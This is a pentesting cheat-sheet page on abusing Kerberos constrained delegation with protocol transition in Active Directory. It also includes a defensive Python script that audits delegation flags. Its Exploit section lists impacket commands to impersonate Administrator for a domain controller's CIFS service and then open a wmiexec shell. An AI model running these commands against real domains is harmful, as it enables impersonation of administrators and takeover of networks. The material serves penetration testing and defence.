# Constrained Delegation Attack

If a compromised account has the Kerberos Constrained Delegation right (with protocol transition), it can impersonate another user to request a Kerberos service ticket on that user's behalf and then use the ticket, for example, to sign in to the delegated service as that user.

### Investigation <a href="#investigation" id="investigation"></a>

#### Check if Kerberos Constrained Delegation Enabled for User <a href="#check-if-kerberos-constrained-delegation-enabled-for-user" id="check-if-kerberos-constrained-delegation-enabled-for-user"></a>

Reference: <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation#prerequisites>

```powershell
Get-NetUser -TrustedToAuth
```
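The PowerView check above only lists users with the "trusted to authenticate for delegation" bit set. The script below is an added defensive example (not from the original page or from PowerView/ired.team): it takes user records exported from the directory, classifies each account's delegation type from its `userAccountControl` flags and `msDS-AllowedToDelegateTo` list, and flags privileged accounts that are not protected from being impersonated (neither "Account is sensitive and cannot be delegated" nor Protected Users membership). The sample records, domain names and group DNs are constructed; the flag values are the documented `userAccountControl` bits.

```python
"""Audit Kerberos delegation settings from exported AD user records.

Added defensive example, not part of the original page. Records are assumed
to carry the attributes below as a plain dict (e.g. from an LDAP export).
"""

# userAccountControl bit flags (documented Microsoft values)
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
NOT_DELEGATED = 0x100000                     # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition

NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000

# Constructed sample export; not real directory data.
SAMPLE_RECORDS = [
    {"sAMAccountName": "websvc",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc.example.local", "ldap/dc.example.local"],
     "memberOf": []},
    {"sAMAccountName": "sqlsvc",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db.example.local:1433"],
     "memberOf": []},
    {"sAMAccountName": "appsrv$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": [],
     "memberOf": []},
    {"sAMAccountName": "Administrator",
     "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED,
     "msDS-AllowedToDelegateTo": [],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=example,DC=local"]},
    {"sAMAccountName": "backupadmin",
     "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": [],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=example,DC=local"]},
]

PRIVILEGED_GROUP_PREFIXES = ("CN=Domain Admins,", "CN=Enterprise Admins,", "CN=Administrators,")


def classify_delegation(record):
    """Return the delegation type configured on an account."""
    uac = record["userAccountControl"]
    targets = record.get("msDS-AllowedToDelegateTo", [])
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets:
        # Protocol transition lets the account obtain tickets for arbitrary
        # users without them authenticating first; this is the risky variant.
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained-protocol-transition"
        return "constrained-kerberos-only"
    return "none"


def is_protected_from_delegation(record):
    """True if the account cannot be impersonated via delegation."""
    if record["userAccountControl"] & NOT_DELEGATED:
        return True
    return any(g.startswith("CN=Protected Users,") for g in record.get("memberOf", []))


def is_privileged(record):
    return any(g.startswith(PRIVILEGED_GROUP_PREFIXES) for g in record.get("memberOf", []))


def audit(records):
    """Summarise delegating accounts and unprotected privileged principals."""
    delegating = []
    unprotected_privileged = []
    for rec in records:
        kind = classify_delegation(rec)
        if kind != "none":
            delegating.append({
                "account": rec["sAMAccountName"],
                "kind": kind,
                "targets": list(rec.get("msDS-AllowedToDelegateTo", [])),
            })
        if is_privileged(rec) and not is_protected_from_delegation(rec):
            unprotected_privileged.append(rec["sAMAccountName"])
    return {"delegating": delegating, "unprotected_privileged": unprotected_privileged}


if __name__ == "__main__":
    result = audit(SAMPLE_RECORDS)
    for item in result["delegating"]:
        print(f"{item['account']:<14} {item['kind']:<32} {', '.join(item['targets'])}")
    print("privileged accounts not protected from delegation:",
          ", ".join(result["unprotected_privileged"]))
```

Real records can be pulled with, for example, `Get-ADUser -Filter * -Properties userAccountControl,msDS-AllowedToDelegateTo,memberOf` (assumed export path, not shown on the page). Accounts reported as `constrained-protocol-transition` are the ones that enable the ticket request in the next section, and any privileged account listed as unprotected is a candidate for the "sensitive and cannot be delegated" flag or Protected Users membership, which makes the impersonation step fail for that user.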

### Exploit <a href="#exploit" id="exploit"></a>

#### 1. Request Service Ticket for Another User <a href="#id-1-request-service-ticket-for-another-user" id="id-1-request-service-ticket-for-another-user"></a>

The target SPN must be one that the compromised account is allowed to delegate to; otherwise the ticket request is refused.

```bash
# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName
```

#### 2. Use the Service Ticket <a href="#id-2-use-the-service-ticket" id="id-2-use-the-service-ticket"></a>

After getting the service ticket, we can use it for further pentesting. First point the Kerberos credential cache at the saved ticket with the environment variable below:

```bash
export KRB5CCNAME=`pwd`/Administrator.ccache

# Check by listing tickets.
# If the klist command is not found, install it with `apt install krb5-user`
klist
```

* Login to Services with Kerberos Auth

  ```bash
  # -k: Use Kerberos Auth
  # -no-pass: No password
  impacket-wmiexec example.local/Administrator@example.local -k -no-pass
  ```
